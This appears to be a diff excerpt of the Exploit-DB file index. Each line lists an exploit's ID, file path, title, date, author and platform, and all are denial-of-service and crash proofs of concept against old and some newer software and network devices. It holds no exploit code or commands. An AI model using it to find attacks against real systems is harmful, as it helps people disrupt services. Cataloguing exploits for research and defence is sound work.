+20949,exploits/windows/dos/20949.c,"1C: Arcadia Internet Store 1.0 - Denial of Service",2001-06-21,"NERF Security",dos,windows, +20952,exploits/linux/dos/20952.c,"eXtremail 1.x/2.1 - Remote Format String (1)",2001-06-21,"Luca Ercoli",dos,linux, +20957,exploits/windows/dos/20957.pl,"WarFTP Daemon 1.82 RC 11 - Remote Format String",2012-08-31,coolkaveh,dos,windows, +20971,exploits/windows/dos/20971.txt,"Adobe Photoshop CS6 - '.png' Parsing Heap Overflow",2012-09-01,"Francis Provencher",dos,windows, +20973,exploits/multiple/dos/20973.txt,"Icecast 1.1.x/1.3.x - Slash File Name Denial of Service",2001-06-26,gollum,dos,multiple, +20989,exploits/windows/dos/20989.txt,"Microsoft IIS 4.0/5.0 - Device File Local Denial of Service",2001-07-04,VIPER_SV,dos,windows, +20991,exploits/windows/dos/20991.txt,"Microsoft IIS 4.0/5.0 - Device File Remote Denial of Service",2001-07-04,VIPER_SV,dos,windows, +20997,exploits/multiple/dos/20997.c,"HP-UX 11 / Linux Kernel 2.4 / Windows 2000/NT 4.0 / IRIX 6.5 - Small TCP MSS Denial of Service",2001-07-07,"Darren Reed",dos,multiple, +21006,exploits/windows/dos/21006.txt,"MAILsweeper SMTP 4.2.1 + F-Secure Anti-Virus 5.0.2/5.2.1 - File Scanner Malicious Archive Denial of Service",2001-07-12,"Michel Arboi",dos,windows, +21012,exploits/multiple/dos/21012.c,"ID Software Quake 1.9 - Denial of Service",2001-07-17,"Andy Gavin",dos,multiple, +40421,exploits/multiple/dos/40421.txt,"Adobe Flash - Crash When Freeing Memory After AVC decoding",2016-09-23,"Google Security Research",dos,multiple, +21016,exploits/windows/dos/21016.c,"ID Software Quake 3 - 'SMURF' Denial of Service",2001-07-17,"Andy Gavin",dos,windows, +21028,exploits/hardware/dos/21028.pl,"Cisco IOS 12 - UDP Denial of Service",2001-07-25,blackangels,dos,hardware, +40420,exploits/multiple/dos/40420.txt,"Adobe Flash - Video Decompression Memory Corruption",2016-09-23,"Google Security Research",dos,multiple, +21040,exploits/windows/dos/21040.txt,"Microsoft Windows 98 - ARP Denial of Service",2001-07-30,"Paul Starzetz",dos,windows, +21042,exploits/multiple/dos/21042.txt,"id Software Quake 3 Arena Server 1.29 - Buffer Overflow",2001-07-29,Coolest,dos,multiple, +21047,exploits/windows/dos/21047.txt,"Microsoft Windows NT 4.0 - NT4ALL Denial of Service",2001-08-03,hypoclear,dos,windows, +21048,exploits/cgi/dos/21048.txt,"John O'Fallon Responder.cgi 1.0 - Denial of Service",1999-04-09,Epic,dos,cgi, +21074,exploits/unix/dos/21074.pl,"glFTPd 1.x - 'LIST' Denial of Service",2001-08-17,"ASGUARD LABS",dos,unix, +21077,exploits/bsd/dos/21077.c,"BSDI 3.0/3.1 - Local Kernel Denial of Service",2001-08-21,V9,dos,bsd, +21092,exploits/hardware/dos/21092.txt,"Cisco CBOS 2.x - Multiple TCP Connection Denial of Service Vulnerabilities",2001-08-23,"Cisco Security",dos,hardware, +40419,exploits/linux/dos/40419.c,"Linux - SELinux W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",dos,linux, +21099,exploits/windows/dos/21099.c,"Microsoft Windows Server 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,dos,windows, +21103,exploits/hardware/dos/21103.c,"D-Link Dl-704 2.56 b5 - IP Fragment Denial of Service",2000-05-23,phonix,dos,hardware, +21122,exploits/linux/dos/21122.sh,"Linux Kernel 2.2/2.4 - Deep Symbolic Link Denial of Service",2001-10-18,Nergal,dos,linux, +21123,exploits/windows/dos/21123.txt,"Microsoft Windows NT/2000 - Terminal Server Service RDP Denial of Service",2001-10-18,"Luciano Martins",dos,windows, +21126,exploits/multiple/dos/21126.c,"6Tunnel 0.6/0.7/0.8 - Connection Close State Denial of Service",2001-10-23,awayzzz,dos,multiple, +21131,exploits/windows/dos/21131.txt,"Microsoft Windows XP/2000 - GDI Denial of Service",2001-10-29,PeterB,dos,windows, +21147,exploits/windows/dos/21147.txt,"WAP Proof 2008 - Denial of Service",2012-09-08,"Orion Einfold",dos,windows, +21141,exploits/linux/dos/21141.txt,"RedHat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service",2001-11-05,"Aiden ORawe",dos,linux, +21143,exploits/windows/dos/21143.pl,"Raptor Firewall 4.0/5.0/6.0.x - Zero Length UDP Packet Resource Consumption",2001-06-21,"Max Moser",dos,windows, +21162,exploits/windows/dos/21162.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerabilities (1)",2001-11-29,"Alex Hernandez",dos,windows, +21163,exploits/windows/dos/21163.pl,"Cooolsoft PowerFTP Server 2.0 3/2.10 - Multiple Denial of Service Vulnerabilities (2)",2001-11-29,"Alex Hernandez",dos,windows, +21167,exploits/openbsd/dos/21167.c,"OpenBSD 2.x/3.0 - User Mode Return Value Denial of Service",2001-12-03,"Marco Peereboom",dos,openbsd, +21170,exploits/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 - Game Server/Client Denial of Service",2001-12-07,sh0,dos,windows, +21171,exploits/windows/dos/21171.c,"Microsoft Windows Server 2000 - Internet Key Exchange Denial of Service (1)",2001-12-11,"Nelson Brito",dos,windows, +21172,exploits/windows/dos/21172.pl,"Microsoft Windows Server 2000 - Internet Key Exchange Denial of Service (2)",2001-12-07,"Nelson Brito",dos,windows, +21174,exploits/windows/dos/21174.c,"Denicomp Winsock RSHD/NT Standard Error 2.20.00 - Denial of Service",2001-12-10,jimmers,dos,windows, +21175,exploits/windows/dos/21175.c,"Denicomp Winsock RSHD/NT Standard Error 2.21.00 - Denial of Service",2001-12-10,jimmers,dos,windows, +21177,exploits/windows/dos/21177.txt,"Microsoft IIS 5.0 - False Content-Length Field Denial of Service",2001-12-11,"Ivan Hernandez Puga",dos,windows, +40757,exploits/windows/dos/40757.xhtml,"Microsoft Internet Explorer 11 - MSHTML CMap­Element::Notify Use-After-Free (MS15-009)",2016-11-14,Skylined,dos,windows, +21181,exploits/multiple/dos/21181.txt,"Microsoft Internet Explorer 6.0 / Mozilla 0.9.6 / Opera 5.1 - Image Count Denial of Service",2001-12-11,"Pavel Titov",dos,multiple, +21202,exploits/linux/dos/21202.txt,"Anti-Web HTTPD 2.2 Script - Engine File Opening Denial of Service",2002-01-04,methodic,dos,linux, +21213,exploits/multiple/dos/21213.txt,"Snort 1.8.3 - ICMP Denial of Service",2002-01-10,Sinbad,dos,multiple, +21224,exploits/lin_x86-64/dos/21224.c,"Oracle VM VirtualBox 4.1 - Local Denial of Service",2012-09-10,halfdog,dos,lin_x86-64, +21228,exploits/windows/dos/21228.c,"Sambar Server 5.1 - Sample Script Denial of Service",2002-02-06,"Tamer Sahin",dos,windows, +21232,exploits/multiple/dos/21232.c,"Oracle 8i - dbsnmp Command Remote Denial of Service",2002-01-17,benjurry,dos,multiple, +21234,exploits/osx/dos/21234.sh,"Netopia Timbuktu Pro for Macintosh 6.0.1 - Denial of Service",2002-01-18,"Tekno pHReak",dos,osx, +21236,exploits/unix/dos/21236.txt,"DNRD 1.x/2.x - DNS Request/Reply Denial of Service",2002-01-20,"Andrew Griffiths",dos,unix, +21237,exploits/windows/dos/21237.pl,"Cyberstop Web Server 0.1 - Long Request Denial of Service",2002-01-22,"Alex Hernandez",dos,windows, +21240,exploits/windows/dos/21240.txt,"Microsoft Windows XP - '.Manifest' Denial of Service",2002-01-21,mosestycoon,dos,windows, +21245,exploits/windows/dos/21245.c,"Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (1)",2001-04-13,3APA3A,dos,windows, +21246,exploits/windows/dos/21246.c,"Microsoft Windows NT 4.0/2000 - TCP Stack Denial of Service (2)",2001-04-13,3APA3A,dos,windows, +21261,exploits/unix/dos/21261.txt,"Tru64 - Malformed TCP Packet Denial of Service",2002-01-31,"Luca Papotti",dos,unix, +21262,exploits/linux/dos/21262.txt,"kicq 2.0.0b1 - Invalid ICQ Packet Denial of Service",2002-02-02,"Rafael San Miguel Carrasco",dos,linux, +21275,exploits/osx/dos/21275.c,"ICQ For Mac OSX 2.6 Client - Denial of Service",2002-02-05,Stephen,dos,osx, +21293,exploits/windows/dos/21293.pl,"Phusion WebServer 1.0 - Long URL Denial of Service",2002-02-16,"Alex Hernandez",dos,windows, +21296,exploits/hardware/dos/21296.c,"Cisco IOS 11/12 - SNMP Message Denial of Service",2002-02-12,kundera,dos,hardware, +21305,exploits/windows/dos/21305.c,"Galacticomm Worldgroup 3.20 - Remote FTP Denial of Service",2002-02-27,"Limpid Byte",dos,windows, +21306,exploits/windows/dos/21306.c,"Galacticomm Worldgroup 3.20 - Remote Web Server Denial of Service",2002-02-27,"Limpid Byte",dos,windows, +21307,exploits/windows/dos/21307.txt,"Rit Research Labs The Bat! 1.53 - Microsoft Denial of Service Device Name Denial of Service",2002-02-27,3APA3A,dos,windows, +21326,exploits/windows/dos/21326.txt,"Novell Groupwise 8.0.2 HP3 and 2012 - Integer Overflow",2012-09-17,"Francis Provencher",dos,windows, +21333,exploits/windows/dos/21333.txt,"AOL Instant Messenger 4.x - Hyperlink Denial of Service",2002-03-01,"NtWaK0 & Recon",dos,windows, +21336,exploits/windows/dos/21336.txt,"Xerver 2.10 - Multiple Request Denial of Service Vulnerabilities",2002-03-08,"Alex Hernandez",dos,windows, +21337,exploits/multiple/dos/21337.c,"Menasoft SPHEREserver 0.99 - Denial of Service",2002-03-09,"H Zero Seven",dos,multiple, +21338,exploits/linux/dos/21338.pl,"XTux Server 2001.0 6.01 - Garbage Denial of Service",2002-03-09,b0iler,dos,linux, +21345,exploits/unix/dos/21345.txt,"Qualcomm QPopper 4.0.x - Remote Denial of Service",2002-03-15,"Jonas Frey",dos,unix, +21346,exploits/windows/dos/21346.html,"Microsoft Internet Explorer 5/6 / Mozilla 0.8/0.9.x / Opera 5/6 - JavaScript Interpreter Denial of Service",2002-03-19,"Patrik Birgersson",dos,windows, +21366,exploits/windows/dos/21366.txt,"Microsoft Internet Explorer 5/6 / Outlook 2000/2002/5.5 / Word 2000/2002 - VBScript ActiveX Word Object Denial of Service",2002-04-08,"Elia Florio",dos,windows, +21419,exploits/windows/dos/21419.txt,"Microsoft Outlook Express 5.5 - Denial of Service Device Denial of Service",2002-04-24,ERRor,dos,windows, +21379,exploits/multiple/dos/21379.pl,"Melange Chat System 2.0.2 Beta 2 - '/yell' Remote Buffer Overflow",2002-04-14,DVDMAN,dos,multiple, +21387,exploits/windows/dos/21387.txt,"WebTrends Reporting Center for Windows 4.0 d - GET Buffer Overflow",2002-04-17,"Mark Litchfield",dos,windows, +21388,exploits/windows/dos/21388.c,"Microsoft Windows Server 2000 - Lanman Denial of Service (1)",2002-04-17,"Daniel Nystrom",dos,windows, +21389,exploits/windows/dos/21389.txt,"Microsoft Windows Server 2000 - Lanman Denial of Service (2)",2003-01-03,ch0wn,dos,windows, +21404,exploits/windows/dos/21404.html,"Microsoft Internet Explorer 5/6 - Self-Referential Object Denial of Service",2002-04-20,"Matthew Murphy",dos,windows, +21409,exploits/unix/dos/21409.pl,"psyBNC 2.3 - Oversized Passwords Denial of Service",2002-04-22,DVDMAN,dos,unix, +21413,exploits/multiple/dos/21413.txt,"National Instruments LabVIEW 5.1.1/6.0/6.1 - HTTP Request Denial of Service",2002-04-19,"Steve Zins",dos,multiple, +21416,exploits/windows/dos/21416.txt,"Microsoft Internet Explorer 5/6 - Recursive JavaScript Event Denial of Service",2002-04-24,"Berend-Jan Wever",dos,windows, +21428,exploits/php/dos/21428.txt,"Messagerie 1.0 - Arbitrary User Removal Denial of Service",2002-04-27,frog,dos,php, +21429,exploits/windows/dos/21429.c,"3CDaemon 2.0 - Buffer Overflow (1)",2002-04-15,"MaD SKiLL",dos,windows, +21431,exploits/irix/dos/21431.txt,"IRIX 6.5.x - Performance Co-Pilot Remote Denial of Service",2002-04-12,"Marcelo Magnasco",dos,irix, +21432,exploits/windows/dos/21432.txt,"BEA Systems WebLogic Server and Express 7.0 - Null Character Denial of Service",2002-04-30,"Peter Gründl",dos,windows, +21465,exploits/hardware/dos/21465.txt,"Cisco IOS 11.x/12.0 - ICMP Redirect Denial of Service",2002-05-21,FX,dos,hardware, +21471,exploits/windows/dos/21471.c,"NewAtlanta ServletExec/ISAPI 4.1 JSPServlet - Denial of Service",2002-05-22,"Matt Moore",dos,windows, +21472,exploits/hardware/dos/21472.pl,"Cisco CBOS 2.x - Broadband Operating System TCP/IP Stack Denial of Service",2002-05-23,blackangels,dos,hardware, +21476,exploits/linux/dos/21476.c,"Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (1)",2002-05-24,zillion,dos,linux, +21477,exploits/linux/dos/21477.c,"Sendmail 8.9.x/8.10.x/8.11.x/8.12.x - File Locking Denial of Service (2)",2002-05-24,zillion,dos,linux, +21481,exploits/windows/dos/21481.txt,"Microsoft MSN Messenger 1 < 4 - Malformed Invite Request Denial of Service",2002-05-24,"Beck Mr.R",dos,windows, +21482,exploits/linux/dos/21482.txt,"MIT PGP Public Key Server 0.9.2/0.9.4 - Search String Remote Buffer Overflow",2002-05-24,Max,dos,linux, +21498,exploits/windows/dos/21498.c,"Evolvable Shambala Server 4.5 - Web Server Denial of Service",2002-05-31,Shambala,dos,windows, +21508,exploits/windows/dos/21508.py,"SafeNet Sentinel Keys Server - Crash (PoC)",2012-09-24,retset,dos,windows, +21512,exploits/freebsd/dos/21512.txt,"Slurp 1.10 - SysLog Remote Format String",2002-06-04,zillion,dos,freebsd, +21518,exploits/linux/dos/21518.txt,"X Window 4.0/4.1/4.2 - System Oversized Font Denial of Service",2002-06-10,"Tom Vogt",dos,linux, +21523,exploits/hardware/dos/21523.txt,"Cisco DPC2100 - Denial of Service",2012-09-26,"Daniel Smith",dos,hardware, +21531,exploits/unix/dos/21531.txt,"Caldera OpenServer 5.0.x - XSCO Color Database File Heap Overflow",2002-06-11,kf,dos,unix, +21534,exploits/linux/dos/21534.jsp,"Apache Tomcat 3/4 - JSP Engine Denial of Service",2002-06-12,"Marc Schoenefeld",dos,linux, +21536,exploits/windows/dos/21536.jsp,"Macromedia JRun 3/4 JSP Engine - Denial of Service",2002-06-12,"Marc Schoenefeld",dos,windows, +21537,exploits/linux/dos/21537.c,"Ayman Akt IRCIT 0.3.1 - Invite Message Remote Buffer Overflow",2002-06-12,gobbles,dos,linux, +21539,exploits/multiple/dos/21539.c,"Netscape 4.x/6.x / Mozilla 0.9.x - Malformed Email POP3 Denial of Service",2002-06-12,eldre8,dos,multiple, +21540,exploits/windows/dos/21540.txt,"Microsoft SQL Server 2000 - SQLXML Buffer Overflow",2002-06-12,"Matt Moore",dos,windows, +21544,exploits/multiple/dos/21544.html,"Netscape 4.77 - Composer Font Face Field Buffer Overflow",2002-06-13,S[h]iff,dos,multiple, +21556,exploits/windows/dos/21556.txt,"Microsoft Internet Explorer 5/6 - CSSText Bold Font Denial of Service",2002-06-15,"Oleg A. Cheremisin",dos,windows, +21561,exploits/hardware/dos/21561.txt,"ZYXEL Prestige 642R Router - Malformed Packet Denial of Service",2002-07-17,"Kistler Ueli",dos,hardware, +21569,exploits/windows/dos/21569.txt,"Microsoft SQL Server 2000 / Microsoft Jet 4.0 Engine - Unicode Buffer Overflow",2002-06-19,NGSSoftware,dos,windows, +21572,exploits/multiple/dos/21572.txt,"Half-Life Server 1.1/3.1 - New Player Flood Denial of Service",2002-06-20,"Auriemma Luigi",dos,multiple, +21575,exploits/multiple/dos/21575.txt,"Apache mod_ssl 2.8.x - Off-by-One HTAccess Buffer Overflow",2002-06-22,"Frank DENIS",dos,multiple, +21580,exploits/linux/dos/21580.txt,"Inktomi Traffic Server 4/5 - Traffic_Manager Path Argument Buffer Overflow",2002-06-25,"Juliano Rizzo",dos,linux, +21593,exploits/multiple/dos/21593.txt,"Epic Games Unreal Tournament Server 436.0 - Denial of Service Amplifier",2002-07-03,"Auriemma Luigi",dos,multiple, +21594,exploits/windows/dos/21594.pl,"WorldSpan Res Manager 4.1 - Malformed TCP Packet Denial of Service",2002-07-04,altomo,dos,windows, +21598,exploits/linux/dos/21598.c,"Linux Kernel 2.4.18/2.4.19 - Privileged File Descriptor Resource Exhaustion (Denial of Service)",2002-07-08,"Paul Starzetz",dos,linux, +21600,exploits/windows/dos/21600.txt,"Working Resources BadBlue 1.7.3 - GET Denial of Service",2002-07-08,"Matthew Murphy",dos,windows, +21612,exploits/windows/dos/21612.txt,"Ultrafunk Popcorn 1.20 - Multiple Denial of Service Vulnerabilities",2002-07-11,"Auriemma Luigi",dos,windows, +21620,exploits/cgi/dos/21620.txt,"Oddsock Song Requester 2.1 WinAmp Plugin - Denial of Service",2002-07-16,"Lucas Lundgren",dos,cgi, +21632,exploits/unix/dos/21632.c,"PHP Interpreter 3.0.x/4.0.x/4.1/4.2 - Direct Invocation Denial of Service",2002-07-22,"Matthew Murphy",dos,unix, +21634,exploits/windows/dos/21634.c,"SecureCRT 2.4/3.x/4.0 - SSH1 Identifier String Buffer Overflow (1)",2002-07-23,Kyuzo,dos,windows, +21637,exploits/hardware/dos/21637.c,"ZYXEL Prestige 642R Router - Malformed IP Packet Denial of Service",2002-07-24,"Jeff w. Roberson",dos,hardware, +21644,exploits/unix/dos/21644.txt,"Pine 4.x - Empty MIME Boundary Denial of Service",2002-07-24,"Martin J. Muench",dos,unix, +21645,exploits/windows/dos/21645.txt,"Foxit Reader 5.4.3.0920 - Crash (PoC)",2012-10-01,coolkaveh,dos,windows, +21653,exploits/windows/dos/21653.c,"KaZaA Media Desktop 1.7.1 - Large Message Denial of Service",2002-07-25,"Josh & omega",dos,windows, +21655,exploits/hardware/dos/21655.c,"Cisco IOS 11.x - TFTP Server Long File Name Buffer Overflow",2002-07-26,FX,dos,hardware, +21656,exploits/hardware/dos/21656.txt,"Lucent Access Point 300/600/1500 IP Services Router - Long HTTP Request Denial of Service",2002-07-27,FX,dos,hardware, +21657,exploits/hardware/dos/21657.txt,"HP ProCurve Switch 4000M - SNMP Write Denial of Service",2002-07-27,FX,dos,hardware, +21673,exploits/windows/dos/21673.txt,"IPSwitch IMail 6.x/7.0.x - Web Calendaring Incomplete Post Denial of Service",2002-07-30,anonymous,dos,windows, +21694,exploits/windows/dos/21694.pl,"602Pro LAN SUITE 2002 - Telnet Proxy localhost Denial of Service",2002-08-03,"Stan Bubrouski",dos,windows, +21703,exploits/windows/dos/21703.txt,"Citrix Metaframe for Windows NT 4.0 TSE 1.8 - Java ICA Environment Denial of Service",2002-08-11,"Tanin Ehrami",dos,windows, +21712,exploits/windows/dos/21712.txt,"Google Toolbar 1.1.60 - Search Function Denial of Service",2002-08-15,onet,dos,windows, +21736,exploits/hardware/dos/21736.txt,"LG LR3100p 1.30 Series Router - IP Packet Flags Denial of Service",2002-08-22,"Lukasz Bromirski",dos,hardware, +21737,exploits/windows/dos/21737.txt,"Cyme ChartFX Client Server - ActiveX Control Array Indexing",2012-10-04,"Francis Provencher",dos,windows, +21739,exploits/windows/dos/21739.pl,"JPEGsnoop 1.5.2 - WriteAV Crash (PoC)",2012-10-04,"Jean Pascal Pereira",dos,windows, +21741,exploits/windows/dos/21741.txt,"XnView 1.99.1 - '.JLS' File Decompression Heap Overflow",2012-10-04,"Joseph Sheridan",dos,windows, +21746,exploits/windows/dos/21746.c,"Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (1)",2002-08-22,"Frederic Deletang",dos,windows, +21747,exploits/windows/dos/21747.txt,"Microsoft Windows XP/2000/NT 4.0 - Network Share Provider SMB Request Buffer Overflow (2)",2002-08-22,zamolx3,dos,windows, +21756,exploits/hardware/dos/21756.txt,"Belkin F5D6130 Wireless Network Access Point - SNMP Request Denial of Service",2002-08-26,wlanman,dos,hardware, +21770,exploits/hardware/dos/21770.c,"Cisco VPN 3000 Series Concentrator Client - Authentication Denial of Service",2002-09-03,Phenoelit,dos,hardware, +21775,exploits/linux/dos/21775.c,"SWS Simple Web Server 0.0.3/0.0.4/0.1 - New Line Denial of Service",2002-09-02,saman,dos,linux, +21782,exploits/multiple/dos/21782.txt,"Oracle 8.1.x/9.0/9.2 - TNS Listener Service_CurLoad Remote Denial of Service",2002-09-09,"Rapid 7",dos,multiple, +21789,exploits/windows/dos/21789.txt,"Alleged Outlook Express 5/6 Link - Denial of Service",2002-09-09,"Stefano Zanero",dos,windows, +21791,exploits/hardware/dos/21791.txt,"Enterasys SSR8000 SmartSwitch - Port Scan Denial of Service",2002-09-13,"Mella Marco",dos,hardware, +21792,exploits/windows/dos/21792.txt,"Savant Web Server 3.1 - Malformed Content-Length Denial of Service",2002-09-13,"Auriemma Luigi",dos,windows, +21795,exploits/windows/dos/21795.pl,"PlanetWeb 1.14 - GET Buffer Overflow",2002-09-16,UkR-XblP,dos,windows, +21813,exploits/windows/dos/21813.c,"Trillian 0.73/0.74 - IRC JOIN Buffer Overflow",2002-09-20,"Lance Fitz-Herbert",dos,windows, +21816,exploits/windows/dos/21816.c,"Trillian 0.725/0.73/0.74 - IRC User Mode Numeric Remote Buffer Overflow",2002-09-21,"Lance Fitz-Herbert",dos,windows, +21819,exploits/windows/dos/21819.c,"Trillian 0.74 - IRC Raw Messages Denial of Service",2002-09-22,"Lance Fitz-Herbert",dos,windows, +21821,exploits/windows/dos/21821.c,"Trillian 0.74 - IRC PART Message Denial of Service",2002-09-22,"Lance Fitz-Herbert",dos,windows, +21823,exploits/windows/dos/21823.c,"Trillian 0.74 - IRC Oversized Data Block Buffer Overflow",2002-09-22,"Lance Fitz-Herbert",dos,windows, +21824,exploits/windows/dos/21824.pl,"Arctic Torrent 1.2.3 - Memory Corruption (Denial of Service)",2012-10-09,"Jean Pascal Pereira",dos,windows, +21826,exploits/windows/dos/21826.pl,"FL Studio 10 Producer Edition - Buffer Overflow (SEH) (PoC)",2012-10-09,Dark-Puzzle,dos,windows, +21828,exploits/hardware/dos/21828.txt,"HP Procurve 4000M Switch - Device Reset Denial of Service",2002-09-24,"Brook Powers",dos,hardware, +21830,exploits/windows/dos/21830.py,"Gom Player 2.1.44.5123 - 'UNICODE' Null Pointer Dereference",2012-10-09,wh1ant,dos,windows, +21854,exploits/linux/dos/21854.c,"Apache 2.0.39/40 - Oversized STDERR Buffer Denial of Service",2002-09-24,"K.C. Wong",dos,linux, +21889,exploits/windows/dos/21889.pl,"VideoLAN VLC Media Player 2.0.3 - '.png' ReadAV Crash (PoC)",2012-10-11,"Jean Pascal Pereira",dos,windows, +21907,exploits/windows/dos/21907.c,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service (1)",2002-10-05,Morgan,dos,windows, +21908,exploits/windows/dos/21908.pl,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service (2)",2002-10-05,subj,dos,windows, +21909,exploits/windows/dos/21909.txt,"Cooolsoft PowerFTP Server 2.x - Remote Denial of Service (3)",2002-10-05,p0pt4rtz,dos,windows, +21911,exploits/multiple/dos/21911.txt,"Oracle 9i Application Server 9.0.2 Web Cache Administration Tool - Denial of Service",2002-10-06,@stake,dos,multiple, +21915,exploits/windows/dos/21915.txt,"Symantec Norton Personal Firewall 2002/Kaspersky Labs Anti-Hacker 1.0/BlackIce Server Protection 3.5/BlackICE Defender 2.9 - Auto Block Denial of Service",2002-10-08,"Yiming Gong",dos,windows, +33403,exploits/windows/dos/33403.py,"Intellicom 1.3 - 'NetBiterConfig.exe Hostname' Data Remote Stack Buffer Overflow",2009-12-14,"Ruben Santamarta",dos,windows, +21935,exploits/windows/dos/21935.txt,"My Web Server 1.0.1/1.0.2 - GET Denial of Service",2002-10-12,"Marc Ruef",dos,windows, +21938,exploits/windows/dos/21938.txt,"TelCondex SimpleWebserver 2.0.6 - Denial of Service",2002-10-15,"Marc Ruef",dos,windows, +21939,exploits/hardware/dos/21939.txt,"Polycom ViaVideo 2.2/3.0 - Denial of Service",2002-10-15,prophecy.net.nz,dos,hardware, +21941,exploits/windows/dos/21941.txt,"Polycom 2.2/3.0 - ViaVideo Buffer Overflow",2002-10-15,prophecy.net.nz,dos,windows, +21943,exploits/windows/dos/21943.c,"Zone Labs ZoneAlarm 3.0/3.1 - Syn Flood Denial of Service",2002-10-16,"Abraham Lincoln",dos,windows, +21949,exploits/unix/dos/21949.txt,"IBM Websphere Caching Proxy 3.6/4.0 - Denial of Service",2002-10-18,Rapid7,dos,unix, +21951,exploits/windows/dos/21951.c,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (1)",2002-10-22,lion,dos,windows, +21952,exploits/windows/dos/21952.c,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (2)",2002-10-22,Trancer,dos,windows, +21953,exploits/windows/dos/21953.txt,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (3)",2002-10-18,Rapid7,dos,windows, +21954,exploits/windows/dos/21954.txt,"Microsoft Windows XP/2000/NT 4.0 - RPC Service Denial of Service (4)",2002-10-18,anonymous,dos,windows, +21963,exploits/windows/dos/21963.pl,"SolarWinds TFTP Server Standard Edition 5.0.55 - Large UDP Packet",2002-10-24,D4rkGr3y,dos,windows, +21965,exploits/windows/dos/21965.txt,"Alt-N MDaemon 6.0.x - POP Server Buffer Overflow",2002-10-28,D4rkGr3y,dos,windows, +21971,exploits/hardware/dos/21971.txt,"Cisco AS5350 - Universal Gateway Portscan Denial of Service",2002-10-28,"Thomas Munn",dos,hardware, +21972,exploits/windows/dos/21972.pl,"SmartMail Server 2.0 - Closed Connection Denial of Service",2002-10-31,"securma massine",dos,windows, +21973,exploits/windows/dos/21973.pl,"SmartMail Server 1.0 Beta 10 - Oversized Request Denial of Service",2002-10-31,"securma massine",dos,windows, +21975,exploits/hardware/dos/21975.txt,"Linksys BEFSR41 1.4x - 'Gozila.cgi' Denial of Service",2002-11-01,"Jeep 94",dos,hardware, +21978,exploits/hardware/dos/21978.txt,"Linksys WAP11 1.3/1.4 / D-Link DI-804 4.68/Dl-704 2.56 b5 - Embedded HTTP Server Denial of Service",2002-11-01,"Mark Litchfield",dos,hardware, +21981,exploits/windows/dos/21981.txt,"Monkey HTTP Server 0.4/0.5 - Invalid POST Denial of Service",2002-11-02,anonymous,dos,windows, +21982,exploits/windows/dos/21982.txt,"Northern Solutions Xeneo Web Server 2.1/2.2 - Denial of Service",2002-11-04,"Tamer Sahin",dos,windows, +21984,exploits/unix/dos/21984.c,"QNX 6.1 - 'TimeCreate' Local Denial of Service",2002-11-06,"Pawel Pisarczyk",dos,unix, +21985,exploits/linux/dos/21985.txt,"Pine 4.x - 'From:' Heap Corruption",2002-11-07,lsjoberg,dos,linux, +21986,exploits/windows/dos/21986.pl,"Microsoft Windows Media Player 10 - '.avi' Integer Division By Zero Crash (PoC)",2012-10-15,Dark-Puzzle,dos,windows, +21991,exploits/windows/dos/21991.py,"QQPlayer 3.7.892 - m2p 'quartz.dll' Heap Pointer Overwrite (PoC)",2012-10-15,"James Ritchey",dos,windows, +22006,exploits/windows/dos/22006.txt,"EZHomeTech EzServer 7.0 - Remote Heap Corruption",2012-10-16,"Lorenzo Cantoni",dos,windows, +22010,exploits/multiple/dos/22010.txt,"Hotfoon Dialer 4.0 - Buffer Overflow",2002-11-11,"S G Masood",dos,multiple, +22011,exploits/linux/dos/22011.c,"ISC BIND 8.3.x - OPT Record Large UDP Denial of Service",2002-11-12,spybreak,dos,linux, +22019,exploits/windows/dos/22019.pl,"IISPop 1.161/1.181 - Remote Buffer Overflow Denial of Service",2002-11-14,"securma massine",dos,windows, +22031,exploits/unix/dos/22031.txt,"Rational ClearCase 4.1 - Portscan Denial of Service",2002-11-22,"Stefan Bagdohn",dos,unix, +22033,exploits/linux/dos/22033.txt,"WSMP3 0.0.1/0.0.2 - Multiple Buffer Overflow Vulnerabilities",2002-11-25,"dong-h0un U",dos,linux, +22053,exploits/multiple/dos/22053.txt,"Moby NetSuite 1.0/1.2 - POST Handler Buffer Overflow",2002-11-29,"Matthew Murphy",dos,multiple, +22056,exploits/linux/dos/22056.txt,"Pserv 2.0 - HTTP Version Specifier Buffer Overflow",2002-11-30,"Matthew Murphy",dos,linux, +22059,exploits/linux/dos/22059.pl,"Pserv 2.0 - HTTP Request Parsing Buffer Overflow",2002-11-01,"Matthew Murphy",dos,linux, +22060,exploits/hardware/dos/22060.txt,"3Com SuperStack 3 NBX 4.0/4.1 - FTPD Denial of Service",2002-12-02,"Michael S. Scheidell",dos,hardware, +22061,exploits/linux/dos/22061.txt,"Cyrus IMAPD 1.4/1.5.19/2.0.12/2.0.16/2.1.9/2.1.10 - Pre-Login Heap Corruption",2002-12-02,"Timo Sirainen",dos,linux, +22062,exploits/hardware/dos/22062.py,"Linksys Devices 1.42/1.43 - GET Buffer Overflow",2002-12-03,"Core Security",dos,hardware, +22068,exploits/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,dos,unix, +22074,exploits/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic (Denial of Service)",2002-11-07,shibby,dos,osx, +22079,exploits/linux/dos/22079.sh,"ProFTPd 1.2.x - 'STAT' Denial of Service",2002-12-09,"Rob klein Gunnewiek",dos,linux, +22081,exploits/windows/dos/22081.pl,"Mollensoft Software Enceladus Server Suite 3.9 - FTP Command Buffer Overflow",2002-12-09,"Tamer Sahin",dos,windows, +22100,exploits/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - Cross-Site Scripting Filter Bypass",2012-10-19,"Jean Pascal Pereira",dos,windows, +22105,exploits/linux/dos/22105.c,"Linux Kernel 2.2 - 'mmap()' Local Denial of Service",2002-12-17,"Michal Zalewski",dos,linux, 